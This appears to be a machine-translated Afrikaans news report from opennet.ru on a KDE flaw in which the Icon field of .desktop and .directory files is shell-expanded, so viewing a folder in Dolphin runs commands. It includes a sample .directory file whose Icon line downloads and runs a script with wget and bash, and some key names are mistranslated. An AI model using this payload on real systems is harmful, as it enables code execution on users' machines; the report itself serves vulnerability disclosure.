In KDE , wat 'n aanvaller toelaat om arbitrêre opdragte uit te voer wanneer 'n gebruiker 'n gids of argief bekyk wat spesiaal ontwerpte ".desktop"- en ".directory"-lêers bevat. 'n Aanval vereis dat die gebruiker bloot 'n lys lêers in die Dolphin-lêerbestuurder bekyk, 'n kwaadwillige lessenaarlêer aflaai, of 'n kortpad na die lessenaar of na 'n dokument sleep. Die probleem manifesteer hom in die huidige vrystelling van biblioteke en ouer weergawes, tot KDE 4. Die kwesbaarheid is steeds (CVE nie toegeken nie).
Die probleem word veroorsaak deur 'n verkeerde implementering van die KDesktopFile-klas, wat, wanneer die "Icon"-veranderlike verwerk word, sonder om behoorlik te ontsnap, die waarde aan die KConfigPrivate::expandString()-funksie oorgee, wat uitbreiding van dop spesiale karakters uitvoer, insluitend verwerking die stringe “$(..)” as opdragte wat uitgevoer moet word. In teenstelling met die vereistes van die XDG-spesifikasie, implementering dopkonstrukte word vervaardig sonder om die tipe instellings te skei, d.w.s. nie net wanneer die opdragreël van die toepassing wat geloods moet word bepaal word nie, maar ook wanneer die ikone wat by verstek vertoon word, spesifiseer.
Byvoorbeeld, om aan te val stuur vir die gebruiker 'n zip-argief met 'n gids wat 'n ".directory"-lêer bevat soos:
[Desktopinskrywing]
Type=Directory
Ikoon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Wanneer jy probeer om die inhoud van die argief in die Dolphin-lêerbestuurder te bekyk, sal die skrip https://example.com/FILENAME.sh afgelaai en uitgevoer word.
Bron: opennet.ru